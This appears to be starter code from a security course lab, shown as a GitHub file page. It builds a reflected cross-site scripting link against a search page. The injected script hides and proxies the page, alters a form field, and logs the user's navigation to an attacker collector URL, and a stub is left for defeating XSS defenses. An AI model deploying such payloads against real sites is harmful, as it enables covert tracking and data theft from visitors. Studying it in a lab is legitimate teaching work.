-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathxss_payload_given.html
43 lines (38 loc) · 1.17 KB
/
xss_payload_given.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<meta charset="utf-8">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
// Extend this function:
function payload(attacker) {
function log(data) {
console.log($.param(data))
$.get(attacker, data);
}
function proxy(href) {
$("html").load(href, function(){
$("html").show();
log({event: "nav", uri: href});
$("#query").val("pwned!");
});
}
$("html").hide();
proxy("./");
}
// make the url; the url embeds the function definition above by calling payload.toString()
function makeLink(xssdefense, target, attacker) {
if (xssdefense == 0) {
return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">");
} else {
// Implement code to defeat XSS defenses here.
}
}
var xssdefense = 0;
var target = "http://permalink.co/";
var attacker = "http://127.0.0.1:31337/stolen";
// This part makes the <a></a> html code for the Try Bungle link
$(function() {
var url = makeLink(xssdefense, target, attacker);
$("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
});
</script>
<h3></h3>